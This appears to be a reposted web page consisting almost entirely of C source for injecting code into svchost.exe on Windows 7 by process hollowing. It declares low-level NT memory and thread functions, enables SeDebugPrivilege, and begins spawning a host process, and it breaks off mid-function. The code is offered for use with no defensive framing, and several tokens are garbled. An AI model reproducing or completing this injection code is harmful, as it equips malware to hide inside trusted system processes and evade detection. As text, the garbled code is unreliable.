Unit injected into WIN7 (transfer)

News

Unit injected into WIN7 (transfer)

September 1, 2023 4Like 46read 0comment

Same as other systems //VC-Win32 #define _WIN32_WINNT 0x0501 #define WIN32_LEAN_AND_MEAN #pragma comment(lib,”ntdll.lib”) #include //sprintf #include //garbage 1 #include //garbage 2 #include //return codes #include //NTSTATUS #define TARGETS_0 “svchost.exe\0” extern “C” { PIMAGE_NT_HEADERS __stdcall RtlImageNtHeader( IN PVOID ModuleAddress ); NTSTATUS __stdcall NtGetContextThread( IN HANDLE ThreadHandle, OUT PCONTEXT pContext ); NTSTATUS __stdcall NtReadVirtualMemory( IN HANDLE ProcessHandle, IN PVOID BaseAddress, OUT PVOID Buffer, IN ULONG NumberOfBytesToRead, OUT PULONG NumberOfBytesReaded OPTIONAL ); NTSTATUS __stdcall NtWriteVirtualMemory( IN HANDLE ProcessHandle, IN PVOID BaseAddress, IN PVOID Buffer, IN ULONG NumberOfBytesToWrite, OUT PULONG NumberOfBytesWritten OPTIONAL ); NTSTATUS __stdcall NtProtectVirtualMemory( IN HANDLE ProcessHandle, IN OUT PVOID *BaseAddress, IN OUT PU LONG NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection ); NTSTATUS __stdcall NtSetContextThread( IN HANDLE ThreadHandle, IN PCONTEXT Context ); NTSTATUS __stdcall NtResumeThread( IN HANDLE ThreadHandle, OUT PULONG SuspendCount OPTIONAL ); NTSTATUS __stdcall ZwUnmapViewOf Section( IN HANDLE ProcessHandle, IN PVOID BaseAddress ); }; char target[MAX_PATH]; void __stdcall set_target(void) { srand(GetCurrentProcessId()); switch( 0 ) { default: case 0: sprintf(target,TARGETS_0);break; } } void __stdcall GainPrivileges(void) { HANDLE hToken; OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken); LUID luid; LookupPrivilegeValueA(NULL,”SeDebugPrivilege”,&luid); TOKEN_PRIVILEGES tp; tp.PrivilegeCount = 1; tp.Privileges[0].Luid #61; luid; tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(TOKEN_PRIVILEGES),FALSE,FALSE); CloseHandle (hToken); } void __stdcall fork_system_file(void* file) { STARTUPINFO si; PROCESS_INFORMATION pi; SECURITY_ATTRIBUTES st; SECURITY_ATTRIBUTES sp; memset(&si,0,sizeof(STARTUPINFO)); memset(&pi,0,sizeof(PROCESS_INFORMATION));…

Contact Us

Contact us

181-3619-1160

Online consultation: QQ交谈

E-mail: [email protected]

Working hours: Monday to Friday, 9:00-17:30, holidays off

Follow wechat
Scan wechat and follow us

Scan wechat and follow us

Follow Weibo
Back to top
首页
微信
电话
搜索